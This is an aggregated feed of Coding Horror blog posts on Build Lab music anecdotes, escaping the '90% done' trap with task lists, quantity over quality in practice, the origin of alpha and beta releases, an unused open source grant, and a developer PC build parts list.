[David] Cutler camped in the Build Lab now, scrutinizing the check-ins, so [Kyle] Shannon wanted him to be comfortable. After further musical experiments, he finally hit on a sound that pleased Cutler. It was a raucous album by the rock group Journey. One morning Shannon slapped on Journey, and heavy metal sounds filled the lab. Cutler started bobbing his head, humming to the cacophony. Shannon smiled. Nodding gratefully, Cutler promised to share with the builders a couple of his own favorite albums.He didn't have any favorite albums, but he saw a chance to relieve tension. That night he asked his companion, Deborah Girdler, to visit a CD store and buy something "really bad." She returned with two discs: Jim Nabors (star of the 1960s TV series Gomer Pyle, U.S.M.C.) singing gospel tunes and the fantasy characters Alvin and the Chipmunks singing children's songs. Perfect, Cutler thought.
The next day Cutler treated his builders to Nabors singing "In the Sweet Bye and Bye," "Onward Christian Soldiders" and other hymns. When Cutler sang along, everyone cringed; it was hard to tell which was more loathesome -- Nabors gone gospel or Cutler gone musical. No one cheered when Cutler asked to hear the Nabors disc over and over again, day after day.
Before long Shannon and the builders regretted ever awakening Cutler's musicality. They finally hid the Nabors disc on the floor under a desk. When Cutler asked for it, Shannon invariably said "It's in my car." Cutler, who caught the lie, laughed and laughed.
So the next time you ask one of your fellow programmers to put on some background coding music for the team, think twice. That's all I'm saying.
Now if you'll excuse me, I'm going to slip on my headphones and get back to coding while listening to one of my favorite albums, The Transformed Man.
Hey, Mr. Tambourine Man, play a song for me ...
| [advertisement] Complimentary paperback book on lightweight peer code review. 10 essays from industry experts. Free shipping. Order Best Kept Secrets of Peer Code Review. |
From Coding Horror, 2 months ago,
0 comments
Although I love reading programming books, I find software project management books to be some of the most mind-numbingly boring reading I've ever attempted. I suppose this means I probably shouldn't be a project manager. The bad news for the Stack Overflow team is that I effectively am one.
That's not to say that all software project management books are crap. Just most of them. One of the few that I've found compelling enough to finish is Johanna Rothman's Behind Closed Doors: Secrets of Great Management.
After reading it, you'll realize this is the book they should be handing out to every newly minted software project manager. And you'll be deeply depressed because you don't work with any software project managers who apparently have read it.
I originally discovered Johanna when one of her pieces was cited in the original Spolsky Best Software Writing book. Her article on team compensation (pdf) basically blew my mind; it forced me to rethink my entire perspective on being paid to work at a job. You should read it. If you have a manager, you should get him or her to read it, too.
Since then, I've touched on her work briefly in Schedule Games and You Are Not Your Job. But I'd like to focus on a specific aspect of project management that I'm apparently not very good at. A caller in Podcast #16 took me to task for my original Stack Overflow schedule claims way back in late April. What was supposed to be "6 to 8 weeks" became.. well, something more like three months.
My problem is that I'm almost pathologically bad about writing things down. Unless I'm writing a blog entry, I suppose. I prefer to keep track of what I'm doing in my head, only anticipating as far ahead as the next item I plan to work on, while proceeding forward as quickly as I can. I think I fell prey, at least a little bit, to this scenario:
"Look, Mike," Tomas said. "I can hand off my code today and call it 'feature complete', but I've probably got three weeks of cleanup work to do once I hand it off." Mike asked what Tomas meant by "cleanup." "I haven't gotten the company logo to show up on every page, and I haven't gotten the agent's name and phone number to print on the bottom of every page. It's little stuff like that. All of the important stuff works fine. I'm 99-percent done."
Do you see the problem here? I know, there are so many it's difficult to know where to begin listing them all, but what's the deepest, most fundamental problem at work here?
This software developer does not have a detailed list of all the things he needs to do. Which means, despite adamantly claiming that he is 99 percent done -- he has no idea how long development will take! There's simply no factual basis for any of his schedule claims.
It is the job of a good software project manager to recognize the tell-tale symptoms of this classic mistake and address them head on before they derail the project. How? By forcingencouraging developers to create a detailed list of everything they need to do. And then breaking that list down into subitems. And then adding all the subitems they inevitably forgot because they didn't think that far ahead. Once you have all those items on a list, then -- and only then -- you can begin to estimate how long the work will take.
Until you've got at least the beginnings of a task list, any concept of scheduling is utter fantasy. A very pleasant fantasy, to be sure, but the real world can be extremely unforgiving to such dreams.
Johanna Rothman makes the same point in a recent email newsletter, and offers specific actions you can take to avoid being stuck 90% done:
List everything you need to do to finish the big chunk of work. I include any infrastructure work such as setting up branches in the source control system.
Estimate each item on that list. This initial estimate will help you see how long it might take to complete the entire task.
Now, look to see how long each item on that list will take to finish. If you have a task longer than one day, break that task into smaller pieces. Breaking larger tasks into these inch-pebbles is critical for escaping the 90% Done syndrome.
Determine a way to show visible status to anyone who's interested. If you're the person doing the work, what would you have to do to show your status to your manager? If you're the manager, what do you need to see? You might need to see lists of test cases or a demo or something else that shows you visible progress.
Since you've got one-day or smaller tasks, you can track your progress daily. I like to keep a chart or list of the tasks, my initial estimated end time and the actual end time for each task. This is especially important for you managers, so you can see if the person is being interrupted and therefore is multitasking. (See the article about the Split Focus schedule game.)
I'm not big on scheduling -- or lists -- but without the latter, I cannot have the former. It's like trying to defy the law of gravity. Thus, on our project, we're always 90% done. If you'd like escape the 90% done ghetto on your software project, don't learn this the hard way, like I did. Every time someone asks you what your schedule is, you should be able to point to a list of everything you need to do. And if you can't -- the first item on your task list should be to create that list.
| [advertisement] Peer Code Review. No meetings. No busy-work. Customizable workflows and reports. Try Jolt Award-winning Code Collaborator. |
From Coding Horror, 2 months ago,
0 comments
Nathan Bowers pointed me to this five year old Cool Tools entry on the book Art & Fear.
Although I am not at all ready to call software development "art" -- perhaps "craft" would be more appropriate, or "engineering" if you're feeling generous -- the parallels between some of the advice offered here and my experience writing software are profound.
The ceramics teacher announced on opening day that he was dividing the class into two groups. All those on the left side of the studio, he said, would be graded solely on the quantity of work they produced, all those on the right solely on its quality. His procedure was simple: on the final day of class he would bring in his bathroom scales and weigh the work of the "quantity" group: fifty pound of pots rated an "A", forty pounds a "B", and so on. Those being graded on "quality", however, needed to produce only one pot - albeit a perfect one - to get an "A".Well, came grading time and a curious fact emerged: the works of highest quality were all produced by the group being graded for quantity. It seems that while the "quantity" group was busily churning out piles of work - and learning from their mistakes - the "quality" group had sat theorizing about perfection, and in the end had little more to show for their efforts than grandiose theories and a pile of dead clay.
Where have I heard this before?
Quantity always trumps quality. That's why the one bit of advice I always give aspiring bloggers is to pick a schedule and stick with it. It's the only advice that matters, because until you've mentally committed to doing it over and over, you will not improve. You can't.
When it comes to software, the same rule applies. If you aren't building, you aren't learning. Rather than agonizing over whether you're building the right thing, just build it. And if that one doesn't work, keep building until you get one that does.
| [advertisement] Peer code review without meetings, paperwork, or stopwatches? No wonder Code Collaborator won the Jolt Award. |
From Coding Horror, 2 months ago,
0 comments
As we begin the private beta for Stack Overflow later this week, I wondered: where do the software terms alpha and beta come from? And why don't we ever use gamma?
|
|
Alpha and Beta are the first two characters of the Greek alphabet. Presumably these characters were chosen because they refer to the first and second rounds of software testing, respectively.
But where did these terms originate? There's an uncited Wikipedia section that claims the alpha and beta monikers came, as did so many other things, from the golden days of IBM:
The term beta test comes from an IBM hardware product test convention, dating back to punched card tabulating and sorting machines. Hardware first went through an alpha test for preliminary functionality and small scale manufacturing feasibility. Then came a beta test, by people or groups other than the developers, to verify that the hardware correctly performed the functions it was supposed to, and that it could be manufactured at scales necessary for the market. And finally, a c test to verify final safety. With the advent of programmable computers and the first shareable software programs, IBM used the same terminology for testing software. As other companies began developing software for their own use, and for distribution to others, the terminology stuck -- and is now part of our common vocabulary.
Based on the software release lifecycle page, and my personal experience, here's how I'd characterize each phase of software development:
The software is still under active development and not feature complete or ready for consumption by anyone other than software developers. There may be milestones during the pre-alpha which deliver specific sets of functionality, and nightly builds for other developers or users who are comfortable living on the absolute bleeding edge.
The software is complete enough for internal testing. This is typically done by people other than the software engineers who wrote it, but still within the same organization or community that developed the software.
The software is complete enough for external testing -- that is, by groups outside the organization or community that developed the software. Beta software is usually feature complete, but may have known limitations or bugs. Betas are either closed (private) and limited to a specific set of users, or they can be open to the general public.
The software is almost ready for final release. No feature development or enhancement of the software is undertaken; tightly scoped bug fixes are the only code you're allowed to write in this phase, and even then only for the most heinous and debilitating of bugs. One of the most experienced software developers I ever worked with characterized the release candidate development phase thusly: "does this bug kill small children?"
The software is finished -- and by finished, we mean there are no show-stopping, little-children-killing bugs in it. That we know of. There are probably numerous lower-prority bugs triaged into the next point release or service pack, as well.
These phases all sound perfectly familiar to me, although there are two clear trends:
In the brave new world of web 2.0, the alpha and beta designations don't mean quite the same things they used to. Perhaps the most troubling trend is the perpetual beta. So many websites stay in perpetual beta, it's almost become a running joke. GMail, for example, is still in beta after over four years!
Although I've seen plenty of release candidates in my day, I've rarely seen a "gamma" or "delta". Apparently Flickr used it for a while in their logo, after heroically soldiering on from beta:
"loves you" is certainly more fun than "gold", but I'm not sure it's ever the same as done. Maybe that's the way it should be.
| [advertisement] Read the largest case study ever published about lightweight peer code review in Best Kept Secrets of Peer Code Review. Free book, free shipping. |
From Coding Horror, 2 months ago,
0 comments
In April I donated $5,000 of the ad revenue from this website to an open source .NET project. It was exciting to be able to inject some of the energy from this blog into the often-neglected .NET open source ecosystem.
As I mentioned at the time, I used a very hands off approach. While I did have some up-front criteria for the award (open source license, public source control, accepts outside source contributions) it's basically a no-strings grant.
The real money is being sent via wire transfer to Dario Solera, the ScrewTurn Wiki project coordinator. What's Dario going to do with this money? You'll have to ask him. That's not for me to decide. There are no strings attached to this money of any kind. I trust the judgment of a fellow programmer to run their project as they see fit.
When I said the project could do whatever they saw fit with the money, I meant it. Buy liquor and cigarettes, throw a huge party, play it on the ponies. I'm not kidding. As long as the project team believes it's a valid way to move their project forward, whatever they say goes. It's their project, and their grant.
I hadn't heard anything from Dario, and I was curious, so I followed up with him via email. He sent back this response:
The grant money is still untouched. It’s not easy to use it. Website hosting fees are fully covered by ads and donations, and there are no other direct expenses to cover. I thought it would be cool to launch a small contest with prizes for the best plugins and/or themes, but that is not easy because of some laws we have here in Italy that render the handling of a contest quite complex.What would you suggest?
I was crushingly disappointed to find out the $5,000 in grant money has been sitting in the bank for the last four months, totally unused. That's painful to hear, possibly the most painful of all outcomes. Why did we bother doing this if nothing changes?
My friend Jon Galloway warned me this might happen. I didn't believe him. But what other conclusion can I draw at this point? He was right:
Open Source is to Traditional Software as Terror Cells are to Large Standing Armies – if you gave a terrorist group a fighter jet, they wouldn't know what to do with it. Open source teams, and culture, have been developed such that they're almost money-agnostic. Open source projects run on time, not money. So, the way to convert that currency is through bounties and funded internships. Unfortunately, setting those up takes time, and since that's the element that's in short supply, we're back to square one.
I had hoped that $5,000 grant money would be converted into something that furthered an open source project -- perhaps something involving the community and garnering more code contributions. But apparently that's more difficult than anyone realized.
Jon offered these ideas:
I must admit I'm at a bit of a loss here. Do you have any ideas for how the Screwturn Wiki project can use their $5,000 open source grant effectively? If so, please share them in the comments here, or on the ScrewTurn forum -- in the Suggestions and Feature Requests area.
Even I'm not naive enough to suggest that money can solve every open source software problem. But I don't have a lot of time to contribute; I only have advertising revenue. I'm absolutely dumbfounded to learn that contributing money isn't an effective way to advance an open source project. Surely money can't be totally useless to open source projects... can it?
| [advertisement] Complimentary paperback book on lightweight peer code review. 10 essays from industry experts. Free shipping. Order Best Kept Secrets of Peer Code Review. |
From Coding Horror, 2 months ago,
0 comments
I got a call from Rob Conery today asking for advice on building his own computer. Rob works for Microsoft, but lives in Hawaii. I'm not sure how he managed that, but being so far from the mothership apparently means he has the flexibility to spec his own PC. Being stuck in Hawaii is, I'm sure, a total bummer, dude.
Rob and I may disagree on pretty much everything from a coding perspective, but we can agree on one thing: we love computers. And what better way to celebrate that love by building your own? It's not hard. This industry was built on the commodification of hardware. If you can snap together a lego kit, you can build a computer.
Maybe this is a minority opinion, but I find understanding the hardware to be instructive for programmers. Peter Norvig -- now director of research at Google -- appears to concur.
Understand how the hardware affects what you do. Know how long it takes your computer to execute an instruction, fetch a word from memory (with and without a cache miss), transfer data over ethernet (or the internet), read consecutive words from disk, and seek to a new location on disk.
In my book, there's no better way to understand the hardware than to get your hands dirty and slap one together, including installing the OS from scratch, yourself. It's a shame Apple programmers can't do this, as their hardware has to be blessed by the Cupertino DRM gods. Or, you could build a frankenmac, though you'll run the risk of running a "patched" OS X indefinitely.
As Rob and I were talking about the philosophy of building your own development PC -- something I also discussed on a Hanselminutes podcast -- he said you know, you should blog this. Ah, but Rob -- I already have! Let's walk down the core list of components I recommended for Rob, along with links to the relevant blog posts on that particular topic.
ASUS P5E Intel X38 motherboard ($225)
I'm a big triple monitor guy, so I insist on motherboards that are capable of accepting two video cards -- in other words, they have two x8 or x16 PCI Express card slots suitable for video cards. I also demand quiet from my PC, which means a motherboard with all passive cooling. Beyond that, I don't like to spend too much on the motherboard. After spending the last five years with motherboards packing scads of features I never end up using (two ethernet ports, anyone?), I've realized there are better ways to invest your money. People tend to respect ASUS as one of the largest and most established Taiwanese OEMs, so it's usually a safe choice. I'd go as far down on price on the motherboard as you can without losing whatever essential features you truly need. Save that money for the other parts.
Intel Core 2 Duo E8500 3.16 GHz CPU ($190)
Intel Core 2 Quad Q9300 2.5 GHz CPU ($270)
Ah, the eternal debate: dual versus quad. Despite what Intel's marketing weasels might want you to believe, clock speed still matters very much. Here's an example: SQL Server 2005 queries on my local box, a 3.5 GHz dual core, execute more than twice as fast as on our server, a 1.8 GHz eight core machine. Sadly, very few development environments parallelize well, with the notable exception of C++ compilers. Outside of a few niche activities, such as video encoding and professional 3D rendering, most computing tasks don't scale worth a damn beyond two cores. Yes, it's exciting to see those four graphs in Task Manager (and even I get a little giddy when I see thirty-two of 'em), but take a look at the cold, hard benchmark data and the contents of your wallet before letting that seductive 4 > 2 math hijack the rational parts of your brain.
It's also smart to buy a little below the maximum, with the ultimate goal of upgrading to a whizzy-bang 4 GHz quad core CPU sometime in the future. One of the hidden value propositions in building your own PC is the ability to easily upgrade it later. CPU is one of the most obvious upgrade points where you want to intentionally underbuy a little. Give yourself some room for future upgrades. Until a quad costs the same as a dual at the same clock speed, my vote still goes to the fastest dual core you can afford.
Kingston 4GB (2 x 2GB) DDR2 800 x 2 ($156)
Memory is awesomely cheap. When it comes to memory, I like to buy a few notches above the cheapest stuff, and Kingston has been a consistently reliable brand for me at that pricing level. There's no reason to bother with anything under 8 GB these days. Don't get hung up on memory speed, though. Quantity is more important than a few extra ticks of speed. But don't take my word for it. As an experiment, Digit-Life cut the speed of memory in half, with a resulting overall average performance loss of merely three percent. By the time your system has to reach outside of the L1, L2, and possibly even L3 cache -- it's already so slow from the system's perspective as to be academic. Memory that is a few extra nanoseconds faster isn't going to make any difference. Remember, kids, Caching Is Fundamental.
Western Digital VelociRaptor 300 GB 10,000 RPM Hard Drive ($290)
This is arguably the only indulgence on the list. The Velociraptor is an incredibly expensive drive, but it's also a rocket of a hard drive. I'm a big believer in the importance of disk speed to overall system performance, particularly for software developers. At least Scott Guthrie backs me up on this one. Trust me, you want a 10,000 RPM boot drive. Buy a slower large drive for your archiving needs. You want two drives, anyway; having two spindles will give you a lot of flexibility and also help your virtual machine performance immensely.
This new raptor model is by far the best of the series. It's much quieter, uses less power, generates less heat, and is by far the fastest of the bunch -- it's embarrassingly fast. It's expensive, yes. I won't hold it against you if you decide to disregard this advice and go with a respectably fast, less expensive hard drive. But to me, it's all about putting the money where the most significant bottlenecks are, and considered in that light -- man, this thing is so worth it. As Storage Review said, "[its] single-user scores .. blow away those of every other [hdd]".
Radeon HD 4850 512MB video card ($155 after rebate)
Even if you're not a gamer, it's hard to ignore the charms of this amazing powerhouse of a video card. This is a card which delivers performance on par with the very fastest $500+ video card you can buy for a measly hundred and fifty bucks! Modern operating systems require video grunt. Beyond that, it's looking more and more like some highly parallizable tasks may move to the GPU. Have you ever read stuff like "even the slowest GPU implementation was nearly 6 times faster than the best-performing CPU version"? Get used to reading statements like that; it's a harbinger of the future. That's another reason, as a programmer and not necessarily a gamer, you still want a modern video card. For all this talk of our manycore CPU future, eventually the GPU could be the death of the general purpose CPU.
We also want our video card to be efficient. Many don't realize this, but your video card can consume as much power as your CPU. Sometimes even more! The 4850, for all its muscle, is remarkably efficient as well. According to a recent AnandTech roundup, it's on par with the most efficient cards of this generation. Pay attention to your idle power consumption, because power consumed means heat produced, which in turn means additional noise and possible instability.
Corsair 520HX 520W Power Supply ($100 after rebate)
The power supply is probably one of the most underrated and misunderstood components of a modern PC. First, because people tend to focus on the "watts" number when the really important number is actually efficiency -- a certain percentage of energy that goes into every power supply is turned into waste heat. An efficient power supply will run cooler and more reliably because it uses higher quality parts. People think you need 1.21 Jigawatts to run a powerful desktop system, but that's just not true. Unless you have a bleeding-edge CPU paired with two high-end top of the line gaming class video cards, trust me -- even 500 watts is overkill.
The Corsair model I recommend gets stellar reviews. It has modular cables and the 80 plus designation, so it's 80% efficient at all input voltages. Note that a quality power supply is not a substitute for a quality UPS or surge protector, but it helps.
Scythe "Ninja" SCNJ-2000 cooler ($50)
Scythe "Ninja Mini" SCMNJ-1000 cooler ($35)
I'll be honest with you. I have a giant heatsink fetish. These giant hunks of aluminum and copper, and the liquid-filled heatpipes that drive them, fascinate me. But there's a more practical reason, as well: if you want a quiet computer, you don't even bother with the stock coolers that are bundled with the CPU. Over the last few years, I keep coming back to Scythe's classic "Ninja" tower cooler, which is available in tall and short varieties. They're so astoundingly efficient that, with adequate case ventilation, they can be run fanless. I even (barely) managed to squeeze the Ninja Mini into my home theater PC build, and it's now mercifully fanless as well. There are plenty of other great tower/heatpipe coolers on the market, but the Ninja is still one of the best, a testament to its pioneering design. The CPU is (usually) the biggest consumer of power in your PC, so it's sensible to invest in a highly efficient aftermarket cooler to keep noise and heat at bay under load.
There you have it. More than you ever possibly wanted to know about how an obsessive geek builds a PC -- painstakingly analyzing every single part that goes into it. Now, like Rob, you're probably sorry you asked; who needs all the philosophical digressions, just give us the damn parts list! OK, here it is:
The best bang for the buck developer x86 box I can come up with, all for around $1100.
I try to avoid posting about hardware too much, but sometimes I can't help myself. I blame Rob. Enjoy your new system, Mr. Conery.
| [advertisement] Complimentary paperback book on lightweight peer code review. 10 essays from industry experts. Free shipping. Order Best Kept Secrets of Peer Code Review. |